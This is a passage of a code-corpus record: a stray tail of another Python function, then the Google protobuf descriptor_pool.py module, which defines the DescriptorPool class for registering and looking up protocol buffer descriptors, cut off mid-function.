reads[node] for other in by_base_writes[node.base]: pre_ops += sets[other] + incs[other] + reads[other] for other in by_base_reads[node.base]: pre_ops += sets[other] + incs[other] + reads[other] dg.add_edges_from(itertools.product(set(pre_ops), post_ops)) return dg
bsd-2-clause
javier-ruiz-b/docker-rasppi-images
raspberry-google-home/env/lib/python3.7/site-packages/google/protobuf/descriptor_pool.py
20
46541
# Protocol Buffers - Google's data interchange format # Copyright 2008 Google Inc. All rights reserved. # https://developers.google.com/protocol-buffers/ # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Provides DescriptorPool to use as a container for proto2 descriptors. The DescriptorPool is used in conjection with a DescriptorDatabase to maintain a collection of protocol buffer descriptors for use when dynamically creating message types at runtime. For most applications protocol buffers should be used via modules generated by the protocol buffer compiler tool. This should only be used when the type of protocol buffers used in an application or library cannot be predetermined. Below is a straightforward example on how to use this class:: pool = DescriptorPool() file_descriptor_protos = [ ... ] for file_descriptor_proto in file_descriptor_protos: pool.Add(file_descriptor_proto) my_message_descriptor = pool.FindMessageTypeByName('some.package.MessageType') The message descriptor can be used in conjunction with the message_factory module in order to create a protocol buffer class that can be encoded and decoded. If you want to get a Python class for the specified proto, use the helper functions inside google.protobuf.message_factory directly instead of this class. """ __author__ = '[email protected] (Matt Toia)' import collections import warnings from google.protobuf import descriptor from google.protobuf import descriptor_database from google.protobuf import text_encoding _USE_C_DESCRIPTORS = descriptor._USE_C_DESCRIPTORS # pylint: disable=protected-access def _Deprecated(func): """Mark functions as deprecated.""" def NewFunc(*args, **kwargs): warnings.warn( 'Call to deprecated function %s(). Note: Do add unlinked descriptors ' 'to descriptor_pool is wrong. Use Add() or AddSerializedFile() ' 'instead.' % func.__name__, category=DeprecationWarning) return func(*args, **kwargs) NewFunc.__name__ = func.__name__ NewFunc.__doc__ = func.__doc__ NewFunc.__dict__.update(func.__dict__) return NewFunc def _NormalizeFullyQualifiedName(name): """Remove leading period from fully-qualified type name. Due to b/13860351 in descriptor_database.py, types in the root namespace are generated with a leading period. This function removes that prefix. Args: name (str): The fully-qualified symbol name. Returns: str: The normalized fully-qualified symbol name. """ return name.lstrip('.') def _OptionsOrNone(descriptor_proto): """Returns the value of the field `options`, or None if it is not set.""" if descriptor_proto.HasField('options'): return descriptor_proto.options else: return None def _IsMessageSetExtension(field): return (field.is_extension and field.containing_type.has_options and field.containing_type.GetOptions().message_set_wire_format and field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL) class DescriptorPool(object): """A collection of protobufs dynamically constructed by descriptor protos.""" if _USE_C_DESCRIPTORS: def __new__(cls, descriptor_db=None): # pylint: disable=protected-access return descriptor._message.DescriptorPool(descriptor_db) def __init__(self, descriptor_db=None): """Initializes a Pool of proto buffs. The descriptor_db argument to the constructor is provided to allow specialized file descriptor proto lookup code to be triggered on demand. An example would be an implementation which will read and compile a file specified in a call to FindFileByName() and not require the call to Add() at all. Results from this database will be cached internally here as well. Args: descriptor_db: A secondary source of file descriptors. """ self._internal_db = descriptor_database.DescriptorDatabase() self._descriptor_db = descriptor_db self._descriptors = {} self._enum_descriptors = {} self._service_descriptors = {} self._file_descriptors = {} self._toplevel_extensions = {} # TODO(jieluo): Remove _file_desc_by_toplevel_extension after # maybe year 2020 for compatibility issue (with 3.4.1 only). self._file_desc_by_toplevel_extension = {} self._top_enum_values = {} # We store extensions in two two-level mappings: The first key is the # descriptor of the message being extended, the second key is the extension # full name or its tag number. self._extensions_by_name = collections.defaultdict(dict) self._extensions_by_number = collections.defaultdict(dict) def _CheckConflictRegister(self, desc, desc_name, file_name): """Check if the descriptor name conflicts with another of the same name. Args: desc: Descriptor of a message, enum, service, extension or enum value. desc_name (str): the full name of desc. file_name (str): The file name of descriptor. """ for register, descriptor_type in [ (self._descriptors, descriptor.Descriptor), (self._enum_descriptors, descriptor.EnumDescriptor), (self._service_descriptors, descriptor.ServiceDescriptor), (self._toplevel_extensions, descriptor.FieldDescriptor), (self._top_enum_values, descriptor.EnumValueDescriptor)]: if desc_name in register: old_desc = register[desc_name] if isinstance(old_desc, descriptor.EnumValueDescriptor): old_file = old_desc.type.file.name else: old_file = old_desc.file.name if not isinstance(desc, descriptor_type) or ( old_file != file_name): error_msg = ('Conflict register for file "' + file_name + '": ' + desc_name + ' is already defined in file "' + old_file + '". Please fix the conflict by adding ' 'package name on the proto file, or use different ' 'name for the duplication.') if isinstance(desc, descriptor.EnumValueDescriptor): error_msg += ('\nNote: enum values appear as ' 'siblings of the enum type instead of ' 'children of it.') raise TypeError(error_msg) return def Add(self, file_desc_proto): """Adds the FileDescriptorProto and its types to this pool. Args: file_desc_proto (FileDescriptorProto): The file descriptor to add. """ self._internal_db.Add(file_desc_proto) def AddSerializedFile(self, serialized_file_desc_proto): """Adds the FileDescriptorProto and its types to this pool. Args: serialized_file_desc_proto (bytes): A bytes string, serialization of the :class:`FileDescriptorProto` to add. """ # pylint: disable=g-import-not-at-top from google.protobuf import descriptor_pb2 file_desc_proto = descriptor_pb2.FileDescriptorProto.FromString( serialized_file_desc_proto) self.Add(file_desc_proto) # Add Descriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddDescriptor(self, desc): self._AddDescriptor(desc) # Never call this method. It is for internal usage only. def _AddDescriptor(self, desc): """Adds a Descriptor to the pool, non-recursively. If the Descriptor contains nested messages or enums, the caller must explicitly register them. This method also registers the FileDescriptor associated with the message. Args: desc: A Descriptor. """ if not isinstance(desc, descriptor.Descriptor): raise TypeError('Expected instance of descriptor.Descriptor.') self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._descriptors[desc.full_name] = desc self._AddFileDescriptor(desc.file) # Add EnumDescriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddEnumDescriptor(self, enum_desc): self._AddEnumDescriptor(enum_desc) # Never call this method. It is for internal usage only. def _AddEnumDescriptor(self, enum_desc): """Adds an EnumDescriptor to the pool. This method also registers the FileDescriptor associated with the enum. Args: enum_desc: An EnumDescriptor. """ if not isinstance(enum_desc, descriptor.EnumDescriptor): raise TypeError('Expected instance of descriptor.EnumDescriptor.') file_name = enum_desc.file.name self._CheckConflictRegister(enum_desc, enum_desc.full_name, file_name) self._enum_descriptors[enum_desc.full_name] = enum_desc # Top enum values need to be indexed. # Count the number of dots to see whether the enum is toplevel or nested # in a message. We cannot use enum_desc.containing_type at this stage. if enum_desc.file.package: top_level = (enum_desc.full_name.count('.') - enum_desc.file.package.count('.') == 1) else: top_level = enum_desc.full_name.count('.') == 0 if top_level: file_name = enum_desc.file.name package = enum_desc.file.package for enum_value in enum_desc.values: full_name = _NormalizeFullyQualifiedName( '.'.join((package, enum_value.name))) self._CheckConflictRegister(enum_value, full_name, file_name) self._top_enum_values[full_name] = enum_value self._AddFileDescriptor(enum_desc.file) # Add ServiceDescriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddServiceDescriptor(self, service_desc): self._AddServiceDescriptor(service_desc) # Never call this method. It is for internal usage only. def _AddServiceDescriptor(self, service_desc): """Adds a ServiceDescriptor to the pool. Args: service_desc: A ServiceDescriptor. """ if not isinstance(service_desc, descriptor.ServiceDescriptor): raise TypeError('Expected instance of descriptor.ServiceDescriptor.') self._CheckConflictRegister(service_desc, service_desc.full_name, service_desc.file.name) self._service_descriptors[service_desc.full_name] = service_desc # Add ExtensionDescriptor to descriptor pool is dreprecated. Please use Add() # or AddSerializedFile() to add a FileDescriptorProto instead. @_Deprecated def AddExtensionDescriptor(self, extension): self._AddExtensionDescriptor(extension) # Never call this method. It is for internal usage only. def _AddExtensionDescriptor(self, extension): """Adds a FieldDescriptor describing an extension to the pool. Args: extension: A FieldDescriptor. Raises: AssertionError: when another extension with the same number extends the same message. TypeError: when the specified extension is not a descriptor.FieldDescriptor. """ if not (isinstance(extension, descriptor.FieldDescriptor) and extension.is_extension): raise TypeError('Expected an extension descriptor.') if extension.extension_scope is None: self._toplevel_extensions[extension.full_name] = extension try: existing_desc = self._extensions_by_number[ extension.containing_type][extension.number] except KeyError: pass else: if extension is not existing_desc: raise AssertionError( 'Extensions "%s" and "%s" both try to extend message type "%s" ' 'with field number %d.' % (extension.full_name, existing_desc.full_name, extension.containing_type.full_name, extension.number)) self._extensions_by_number[extension.containing_type][ extension.number] = extension self._extensions_by_name[extension.containing_type][ extension.full_name] = extension # Also register MessageSet extensions with the type name. if _IsMessageSetExtension(extension): self._extensions_by_name[extension.containing_type][ extension.message_type.full_name] = extension @_Deprecated def AddFileDescriptor(self, file_desc): self._InternalAddFileDescriptor(file_desc) # Never call this method. It is for internal usage only. def _InternalAddFileDescriptor(self, file_desc): """Adds a FileDescriptor to the pool, non-recursively. If the FileDescriptor contains messages or enums, the caller must explicitly register them. Args: file_desc: A FileDescriptor. """ self._AddFileDescriptor(file_desc) # TODO(jieluo): This is a temporary solution for FieldDescriptor.file. # FieldDescriptor.file is added in code gen. Remove this solution after # maybe 2020 for compatibility reason (with 3.4.1 only). for extension in file_desc.extensions_by_name.values(): self._file_desc_by_toplevel_extension[ extension.full_name] = file_desc def _AddFileDescriptor(self, file_desc): """Adds a FileDescriptor to the pool, non-recursively. If the FileDescriptor contains messages or enums, the caller must explicitly register them. Args: file_desc: A FileDescriptor. """ if not isinstance(file_desc, descriptor.FileDescriptor): raise TypeError('Expected instance of descriptor.FileDescriptor.') self._file_descriptors[file_desc.name] = file_desc def FindFileByName(self, file_name): """Gets a FileDescriptor by file name. Args: file_name (str): The path to the file to get a descriptor for. Returns: FileDescriptor: The descriptor for the named file. Raises: KeyError: if the file cannot be found in the pool. """ try: return self._file_descriptors[file_name] except KeyError: pass try: file_proto = self._internal_db.FindFileByName(file_name) except KeyError as error: if self._descriptor_db: file_proto = self._descriptor_db.FindFileByName(file_name) else: raise error if not file_proto: raise KeyError('Cannot find a file named %s' % file_name) return self._ConvertFileProtoToFileDescriptor(file_proto) def FindFileContainingSymbol(self, symbol): """Gets the FileDescriptor for the file containing the specified symbol. Args: symbol (str): The name of the symbol to search for. Returns: FileDescriptor: Descriptor for the file that contains the specified symbol. Raises: KeyError: if the file cannot be found in the pool. """ symbol = _NormalizeFullyQualifiedName(symbol) try: return self._InternalFindFileContainingSymbol(symbol) except KeyError: pass try: # Try fallback database. Build and find again if possible. self._FindFileContainingSymbolInDb(symbol) return self._InternalFindFileContainingSymbol(symbol) except KeyError: raise KeyError('Cannot find a file containing %s' % symbol) def _InternalFindFileContainingSymbol(self, symbol): """Gets the already built FileDescriptor containing the specified symbol. Args: symbol (str): The name of the symbol to search for. Returns: FileDescriptor: Descriptor for the file that contains the specified symbol. Raises: KeyError: if the file cannot be found in the pool. """ try: return self._descriptors[symbol].file except KeyError: pass try: return self._enum_descriptors[symbol].file except KeyError: pass try: return self._service_descriptors[symbol].file except KeyError: pass try: return self._top_enum_values[symbol].type.file except KeyError: pass try: return self._file_desc_by_toplevel_extension[symbol] except KeyError: pass # Try fields, enum values and nested extensions inside a message. top_name, _, sub_name = symbol.rpartition('.') try: message = self.FindMessageTypeByName(top_name) assert (sub_name in message.extensions_by_name or sub_name in message.fields_by_name or sub_name in message.enum_values_by_name) return message.file except (KeyError, AssertionError): raise KeyError('Cannot find a file containing %s' % symbol) def FindMessageTypeByName(self, full_name): """Loads the named descriptor from the pool. Args: full_name (str): The full name of the descriptor to load. Returns: Descriptor: The descriptor for the named type. Raises: KeyError: if the message cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) if full_name not in self._descriptors: self._FindFileContainingSymbolInDb(full_name) return self._descriptors[full_name] def FindEnumTypeByName(self, full_name): """Loads the named enum descriptor from the pool. Args: full_name (str): The full name of the enum descriptor to load. Returns: EnumDescriptor: The enum descriptor for the named type. Raises: KeyError: if the enum cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) if full_name not in self._enum_descriptors: self._FindFileContainingSymbolInDb(full_name) return self._enum_descriptors[full_name] def FindFieldByName(self, full_name): """Loads the named field descriptor from the pool. Args: full_name (str): The full name of the field descriptor to load. Returns: FieldDescriptor: The field descriptor for the named field. Raises: KeyError: if the field cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) message_name, _, field_name = full_name.rpartition('.') message_descriptor = self.FindMessageTypeByName(message_name) return message_descriptor.fields_by_name[field_name] def FindOneofByName(self, full_name): """Loads the named oneof descriptor from the pool. Args: full_name (str): The full name of the oneof descriptor to load. Returns: OneofDescriptor: The oneof descriptor for the named oneof. Raises: KeyError: if the oneof cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) message_name, _, oneof_name = full_name.rpartition('.') message_descriptor = self.FindMessageTypeByName(message_name) return message_descriptor.oneofs_by_name[oneof_name] def FindExtensionByName(self, full_name): """Loads the named extension descriptor from the pool. Args: full_name (str): The full name of the extension descriptor to load. Returns: FieldDescriptor: The field descriptor for the named extension. Raises: KeyError: if the extension cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) try: # The proto compiler does not give any link between the FileDescriptor # and top-level extensions unless the FileDescriptorProto is added to # the DescriptorDatabase, but this can impact memory usage. # So we registered these extensions by name explicitly. return self._toplevel_extensions[full_name] except KeyError: pass message_name, _, extension_name = full_name.rpartition('.') try: # Most extensions are nested inside a message. scope = self.FindMessageTypeByName(message_name) except KeyError: # Some extensions are defined at file scope. scope = self._FindFileContainingSymbolInDb(full_name) return scope.extensions_by_name[extension_name] def FindExtensionByNumber(self, message_descriptor, number): """Gets the extension of the specified message with the specified number. Extensions have to be registered to this pool by calling :func:`Add` or :func:`AddExtensionDescriptor`. Args: message_descriptor (Descriptor): descriptor of the extended message. number (int): Number of the extension field. Returns: FieldDescriptor: The descriptor for the extension. Raises: KeyError: when no extension with the given number is known for the specified message. """ try: return self._extensions_by_number[message_descriptor][number] except KeyError: self._TryLoadExtensionFromDB(message_descriptor, number) return self._extensions_by_number[message_descriptor][number] def FindAllExtensions(self, message_descriptor): """Gets all the known extensions of a given message. Extensions have to be registered to this pool by build related :func:`Add` or :func:`AddExtensionDescriptor`. Args: message_descriptor (Descriptor): Descriptor of the extended message. Returns: list[FieldDescriptor]: Field descriptors describing the extensions. """ # Fallback to descriptor db if FindAllExtensionNumbers is provided. if self._descriptor_db and hasattr( self._descriptor_db, 'FindAllExtensionNumbers'): full_name = message_descriptor.full_name all_numbers = self._descriptor_db.FindAllExtensionNumbers(full_name) for number in all_numbers: if number in self._extensions_by_number[message_descriptor]: continue self._TryLoadExtensionFromDB(message_descriptor, number) return list(self._extensions_by_number[message_descriptor].values()) def _TryLoadExtensionFromDB(self, message_descriptor, number): """Try to Load extensions from descriptor db. Args: message_descriptor: descriptor of the extended message. number: the extension number that needs to be loaded. """ if not self._descriptor_db: return # Only supported when FindFileContainingExtension is provided. if not hasattr( self._descriptor_db, 'FindFileContainingExtension'): return full_name = message_descriptor.full_name file_proto = self._descriptor_db.FindFileContainingExtension( full_name, number) if file_proto is None: return try: self._ConvertFileProtoToFileDescriptor(file_proto) except: warn_msg = ('Unable to load proto file %s for extension number %d.' % (file_proto.name, number)) warnings.warn(warn_msg, RuntimeWarning) def FindServiceByName(self, full_name): """Loads the named service descriptor from the pool. Args: full_name (str): The full name of the service descriptor to load. Returns: ServiceDescriptor: The service descriptor for the named service. Raises: KeyError: if the service cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) if full_name not in self._service_descriptors: self._FindFileContainingSymbolInDb(full_name) return self._service_descriptors[full_name] def FindMethodByName(self, full_name): """Loads the named service method descriptor from the pool. Args: full_name (str): The full name of the method descriptor to load. Returns: MethodDescriptor: The method descriptor for the service method. Raises: KeyError: if the method cannot be found in the pool. """ full_name = _NormalizeFullyQualifiedName(full_name) service_name, _, method_name = full_name.rpartition('.') service_descriptor = self.FindServiceByName(service_name) return service_descriptor.methods_by_name[method_name] def _FindFileContainingSymbolInDb(self, symbol): """Finds the file in descriptor DB containing the specified symbol. Args: symbol (str): The name of the symbol to search for. Returns: FileDescriptor: The file that contains the specified symbol. Raises: KeyError: if the file cannot be found in the descriptor database. """ try: file_proto = self._internal_db.FindFileContainingSymbol(symbol) except KeyError as error: if self._descriptor_db: file_proto = self._descriptor_db.FindFileContainingSymbol(symbol) else: raise error if not file_proto: raise KeyError('Cannot find a file containing %s' % symbol) return self._ConvertFileProtoToFileDescriptor(file_proto) def _ConvertFileProtoToFileDescriptor(self, file_proto): """Creates a FileDescriptor from a proto or returns a cached copy. This method also has the side effect of loading all the symbols found in the file into the appropriate dictionaries in the pool. Args: file_proto: The proto to convert. Returns: A FileDescriptor matching the passed in proto. """ if file_proto.name not in self._file_descriptors: built_deps = list(self._GetDeps(file_proto.dependency)) direct_deps = [self.FindFileByName(n) for n in file_proto.dependency] public_deps = [direct_deps[i] for i in file_proto.public_dependency] file_descriptor = descriptor.FileDescriptor( pool=self, name=file_proto.name, package=file_proto.package, syntax=file_proto.syntax, options=_OptionsOrNone(file_proto), serialized_pb=file_proto.SerializeToString(), dependencies=direct_deps, public_dependencies=public_deps, # pylint: disable=protected-access create_key=descriptor._internal_create_key) scope = {} # This loop extracts all the message and enum types from all the # dependencies of the file_proto. This is necessary to create the # scope of available message types when defining the passed in # file proto. for dependency in built_deps: scope.update(self._ExtractSymbols( dependency.message_types_by_name.values())) scope.update((_PrefixWithDot(enum.full_name), enum) for enum in dependency.enum_types_by_name.values()) for message_type in file_proto.message_type: message_desc = self._ConvertMessageDescriptor( message_type, file_proto.package, file_descriptor, scope, file_proto.syntax) file_descriptor.message_types_by_name[message_desc.name] = ( message_desc) for enum_type in file_proto.enum_type: file_descriptor.enum_types_by_name[enum_type.name] = ( self._ConvertEnumDescriptor(enum_type, file_proto.package, file_descriptor, None, scope, True)) for index, extension_proto in enumerate(file_proto.extension): extension_desc = self._MakeFieldDescriptor( extension_proto, file_proto.package, index, file_descriptor, is_extension=True) extension_desc.containing_type = self._GetTypeFromScope( file_descriptor.package, extension_proto.extendee, scope) self._SetFieldType(extension_proto, extension_desc, file_descriptor.package, scope) file_descriptor.extensions_by_name[extension_desc.name] = ( extension_desc) self._file_desc_by_toplevel_extension[extension_desc.full_name] = ( file_descriptor) for desc_proto in file_proto.message_type: self._SetAllFieldTypes(file_proto.package, desc_proto, scope) if file_proto.package: desc_proto_prefix = _PrefixWithDot(file_proto.package) else: desc_proto_prefix = '' for desc_proto in file_proto.message_type: desc = self._GetTypeFromScope( desc_proto_prefix, desc_proto.name, scope) file_descriptor.message_types_by_name[desc_proto.name] = desc for index, service_proto in enumerate(file_proto.service): file_descriptor.services_by_name[service_proto.name] = ( self._MakeServiceDescriptor(service_proto, index, scope, file_proto.package, file_descriptor)) self.Add(file_proto) self._file_descriptors[file_proto.name] = file_descriptor # Add extensions to the pool file_desc = self._file_descriptors[file_proto.name] for extension in file_desc.extensions_by_name.values(): self._AddExtensionDescriptor(extension) for message_type in file_desc.message_types_by_name.values(): for extension in message_type.extensions: self._AddExtensionDescriptor(extension) return file_desc def _ConvertMessageDescriptor(self, desc_proto, package=None, file_desc=None, scope=None, syntax=None): """Adds the proto to the pool in the specified package. Args: desc_proto: The descriptor_pb2.DescriptorProto protobuf message. package: The package the proto should be located in. file_desc: The file containing this message. scope: Dict mapping short and full symbols to message and enum types. syntax: string indicating syntax of the file ("proto2" or "proto3") Returns: The added descriptor. """ if package: desc_name = '.'.join((package, desc_proto.name)) else: desc_name = desc_proto.name if file_desc is None: file_name = None else: file_name = file_desc.name if scope is None: scope = {} nested = [ self._ConvertMessageDescriptor( nested, desc_name, file_desc, scope, syntax) for nested in desc_proto.nested_type] enums = [ self._ConvertEnumDescriptor(enum, desc_name, file_desc, None, scope, False) for enum in desc_proto.enum_type] fields = [self._MakeFieldDescriptor(field, desc_name, index, file_desc) for index, field in enumerate(desc_proto.field)] extensions = [ self._MakeFieldDescriptor(extension, desc_name, index, file_desc, is_extension=True) for index, extension in enumerate(desc_proto.extension)] oneofs = [ # pylint: disable=g-complex-comprehension descriptor.OneofDescriptor(desc.name, '.'.join((desc_name, desc.name)), index, None, [], desc.options, # pylint: disable=protected-access create_key=descriptor._internal_create_key) for index, desc in enumerate(desc_proto.oneof_decl)] extension_ranges = [(r.start, r.end) for r in desc_proto.extension_range] if extension_ranges: is_extendable = True else: is_extendable = False desc = descriptor.Descriptor( name=desc_proto.name, full_name=desc_name, filename=file_name, containing_type=None, fields=fields, oneofs=oneofs, nested_types=nested, enum_types=enums, extensions=extensions, options=_OptionsOrNone(desc_proto), is_extendable=is_extendable, extension_ranges=extension_ranges, file=file_desc, serialized_start=None, serialized_end=None, syntax=syntax, # pylint: disable=protected-access create_key=descriptor._internal_create_key) for nested in desc.nested_types: nested.containing_type = desc for enum in desc.enum_types: enum.containing_type = desc for field_index, field_desc in enumerate(desc_proto.field): if field_desc.HasField('oneof_index'): oneof_index = field_desc.oneof_index oneofs[oneof_index].fields.append(fields[field_index]) fields[field_index].containing_oneof = oneofs[oneof_index] scope[_PrefixWithDot(desc_name)] = desc self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._descriptors[desc_name] = desc return desc def _ConvertEnumDescriptor(self, enum_proto, package=None, file_desc=None, containing_type=None, scope=None, top_level=False): """Make a protobuf EnumDescriptor given an EnumDescriptorProto protobuf. Args: enum_proto: The descriptor_pb2.EnumDescriptorProto protobuf message. package: Optional package name for the new message EnumDescriptor. file_desc: The file containing the enum descriptor. containing_type: The type containing this enum. scope: Scope containing available types. top_level: If True, the enum is a top level symbol. If False, the enum is defined inside a message. Returns: The added descriptor """ if package: enum_name = '.'.join((package, enum_proto.name)) else: enum_name = enum_proto.name if file_desc is None: file_name = None else: file_name = file_desc.name values = [self._MakeEnumValueDescriptor(value, index) for index, value in enumerate(enum_proto.value)] desc = descriptor.EnumDescriptor(name=enum_proto.name, full_name=enum_name, filename=file_name, file=file_desc, values=values, containing_type=containing_type, options=_OptionsOrNone(enum_proto), # pylint: disable=protected-access create_key=descriptor._internal_create_key) scope['.%s' % enum_name] = desc self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._enum_descriptors[enum_name] = desc # Add top level enum values. if top_level: for value in values: full_name = _NormalizeFullyQualifiedName( '.'.join((package, value.name))) self._CheckConflictRegister(value, full_name, file_name) self._top_enum_values[full_name] = value return desc def _MakeFieldDescriptor(self, field_proto, message_name, index, file_desc, is_extension=False): """Creates a field descriptor from a FieldDescriptorProto. For message and enum type fields, this method will do a look up in the pool for the appropriate descriptor for that type. If it is unavailable, it will fall back to the _source function to create it. If this type is still unavailable, construction will fail. Args: field_proto: The proto describing the field. message_name: The name of the containing message. index: Index of the field file_desc: The file containing the field descriptor. is_extension: Indication that this field is for an extension. Returns: An initialized FieldDescriptor object """ if message_name: full_name = '.'.join((message_name, field_proto.name)) else: full_name = field_proto.name return descriptor.FieldDescriptor( name=field_proto.name, full_name=full_name, index=index, number=field_proto.number, type=field_proto.type, cpp_type=None, message_type=None, enum_type=None, containing_type=None, label=field_proto.label, has_default_value=False, default_value=None, is_extension=is_extension, extension_scope=None, options=_OptionsOrNone(field_proto), file=file_desc, # pylint: disable=protected-access create_key=descriptor._internal_create_key) def _SetAllFieldTypes(self, package, desc_proto, scope): """Sets all the descriptor's fields's types. This method also sets the containing types on any extensions. Args: package: The current package of desc_proto. desc_proto: The message descriptor to update. scope: Enclosing scope of available types. """ package = _PrefixWithDot(package) main_desc = self._GetTypeFromScope(package, desc_proto.name, scope) if package == '.': nested_package = _PrefixWithDot(desc_proto.name) else: nested_package = '.'.join([package, desc_proto.name]) for field_proto, field_desc in zip(desc_proto.field, main_desc.fields): self._SetFieldType(field_proto, field_desc, nested_package, scope) for extension_proto, extension_desc in ( zip(desc_proto.extension, main_desc.extensions)): extension_desc.containing_type = self._GetTypeFromScope( nested_package, extension_proto.extendee, scope) self._SetFieldType(extension_proto, extension_desc, nested_package, scope) for nested_type in desc_proto.nested_type: self._SetAllFieldTypes(nested_package, nested_type, scope) def _SetFieldType(self, field_proto, field_desc, package, scope): """Sets the field's type, cpp_type, message_type and enum_type. Args: field_proto: Data about the field in proto format. field_desc: The descriptor to modify. package: The package the field's container is in. scope: Enclosing scope of available types. """ if field_proto.type_name: desc = self._GetTypeFromScope(package, field_proto.type_name, scope) else: desc = None if not field_proto.HasField('type'): if isinstance(desc, descriptor.Descriptor): field_proto.type = descriptor.FieldDescriptor.TYPE_MESSAGE else: field_proto.type = descriptor.FieldDescriptor.TYPE_ENUM field_desc.cpp_type = descriptor.FieldDescriptor.ProtoTypeToCppProtoType( field_proto.type) if (field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE or field_proto.type == descriptor.FieldDescriptor.TYPE_GROUP): field_desc.message_type = desc if field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM: field_desc.enum_type = desc if field_proto.label == descriptor.FieldDescriptor.LABEL_REPEATED: field_desc.has_default_value = False field_desc.default_value = [] elif field_proto.HasField('default_value'): field_desc.has_default_value = True if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT): field_desc.default_value = float(field_proto.default_value) elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING: field_desc.default_value = field_proto.default_value elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL: field_desc.default_value = field_proto.default_value.lower() == 'true' elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM: field_desc.default_value = field_desc.enum_type.values_by_name[ field_proto.default_value].number elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES: field_desc.default_value = text_encoding.CUnescape( field_proto.default_value) elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE: field_desc.default_value = None else: # All other types are of the "int" type. field_desc.default_value = int(field_proto.default_value) else: field_desc.has_default_value = False if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT): field_desc.default_value = 0.0 elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING: field_desc.default_value = u'' elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL: field_desc.default_value = False elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM: field_desc.default_value = field_desc.enum_type.values[0].number elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES: field_desc.default_value = b'' elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE: field_desc.default_value = None else: # All other types are of the "int" type. field_desc.default_value = 0 field_desc.type = field_proto.type def _MakeEnumValueDescriptor(self, value_proto, index): """Creates a enum value descriptor object from a enum value proto. Args: value_proto: The proto describing the enum value. index: The index of the enum value. Returns: An initialized EnumValueDescriptor object. """ return descriptor.EnumValueDescriptor( name=value_proto.name, index=index, number=value_proto.number, options=_OptionsOrNone(value_proto), type=None, # pylint: disable=protected-access create_key=descriptor._internal_create_key) def _MakeServiceDescriptor(self, service_proto, service_index, scope, package, file_desc): """Make a protobuf ServiceDescriptor given a ServiceDescriptorProto. Args: service_proto: The descriptor_pb2.ServiceDescriptorProto protobuf message. service_index: The index of the service in the File. scope: Dict mapping short and full symbols to message and enum types. package: Optional package name for the new message EnumDescriptor. file_desc: The file containing the service descriptor. Returns: The added descriptor. """ if package: service_name = '.'.join((package, service_proto.name)) else: service_name = service_proto.name methods = [self._MakeMethodDescriptor(method_proto, service_name, package, scope, index) for index, method_proto in enumerate(service_proto.method)] desc = descriptor.ServiceDescriptor( name=service_proto.name, full_name=service_name, index=service_index, methods=methods, options=_OptionsOrNone(service_proto), file=file_desc, # pylint: disable=protected-access create_key=descriptor._internal_create_key) self._CheckConflictRegister(desc, desc.full_name, desc.file.name) self._service_descriptors[service_name] = desc return desc def _MakeMethodDescriptor(self, method_proto, service_name, package, scope, index): """Creates a method descriptor from a MethodDescriptorProto. Args: method_proto: The proto describing the method. service_name: The name of the containing service. package: Optional package name to look up for types. scope: Scope containing available types. index: Index of the method in the service. Returns: An initialized MethodDescriptor object. """ full_name = '.'.join((service_name, method_proto.name)) input_type = self._GetTypeFromScope( package, method_proto.input_type, scope) output_type = self._GetTypeFromScope( package, method_proto.output_type, scope) return descriptor.MethodDescriptor( name=method_proto.name, full_name=full_name, index=index, containing_service=None, input_type=input_type, 